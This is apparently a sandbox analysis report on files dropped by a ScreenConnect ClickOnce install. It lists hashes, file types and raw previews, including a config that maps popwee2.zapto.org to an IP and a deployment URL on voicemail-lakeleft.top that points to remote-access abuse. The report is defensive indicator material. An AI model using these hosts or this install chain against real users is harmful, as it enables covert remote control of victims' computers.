                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>popwee2.zapto.org=194.59.30.201-08%2f11%2f2024%2011%3a44%3a40</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):68096
                                                                                                                                                                                                                                                                  Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                                  MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                                  SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                                  SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                                  SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1373
                                                                                                                                                                                                                                                                  Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                                                  MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                                                  SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                                                  SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                                                  SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):847
                                                                                                                                                                                                                                                                  Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                                                  MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                                                  SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                                                  SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                                                  SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (625), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):15036
                                                                                                                                                                                                                                                                  Entropy (8bit):3.8067322020953793
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:84JqHzST41Uaa4JqHzSdd724JqHzSi+43LEv:8FqKUJFsR2FiAA
                                                                                                                                                                                                                                                                  MD5:69E0ECBD1DD4C0A6FDEABE7F213E7402
                                                                                                                                                                                                                                                                  SHA1:7A72788B4461039F28D750DBB9B5993E8D3E4A51
                                                                                                                                                                                                                                                                  SHA-256:D9F339DEFDE480286650E673FEFE904DA4D187696C2909E7A6FC8D6D380027EA
                                                                                                                                                                                                                                                                  SHA-512:6135474BF83F511E327834BF471A887158B8DCD9F593C183B62D366806BABD2EFAC608D326DF24FCA855CDE0A20F233550DE63BBD449672365355012DAA66E69
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.v.o.i.c.e.m.a.i.l.-.l.a.k.e.l.e.f.t...t.o.p./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.p.o.p.w.e.e.2...z.a.p.t.o...o.r.g.&.p.=.8.0.4.1.&.s.=.4.b.4.3.e.6.5.1.-.6.d.2.1.-.4.8.a.4.
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):117980
                                                                                                                                                                                                                                                                  Entropy (8bit):5.585720273564656
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:0aNIcT51/FXvMVNWfCXq9ymSm2o9HuzhJOvP:0FcfiVI8mt8vOvP
                                                                                                                                                                                                                                                                  MD5:4E152D84C20AB6330FF0CF47A9AF7C6D
                                                                                                                                                                                                                                                                  SHA1:018F32D833124056FCCFC200318542687D0E5565
                                                                                                                                                                                                                                                                  SHA-256:5668723C31F6726947DFEDA324B26D27F7E899647C22A4B1B2BEA935BA8A6B10
                                                                                                                                                                                                                                                                  SHA-512:2F3F6B397072B795C74C44F19012483E2785DDEE5A7F5D7E38C566EBC9A94AE084504061F697DB714B933B79824CBC6B08B7718536A19FA21D11AD8D0F8AFB79
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):197120
                                                                                                                                                                                                                                                                  Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                                  MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                                  SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                                  SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                                                                  SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1041
                                                                                                                                                                                                                                                                  Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                                                                  MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                                                                  SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                                                                  SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                                                                  SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):68096
                                                                                                                                                                                                                                                                  Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                                  MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                                  SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                                  SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                                  SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1636
                                                                                                                                                                                                                                                                  Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                                                                  MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                                                                  SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                                                                  SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                                                                  SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):95520
                                                                                                                                                                                                                                                                  Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                                                                  MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                                  SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                                                                  SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                                                                  SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):548864
                                                                                                                                                                                                                                                                  Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1216
                                                                                                                                                                                                                                                                  Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                                  MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                                  SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                                  SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                                  SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1721856
                                                                                                                                                                                                                                                                  Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
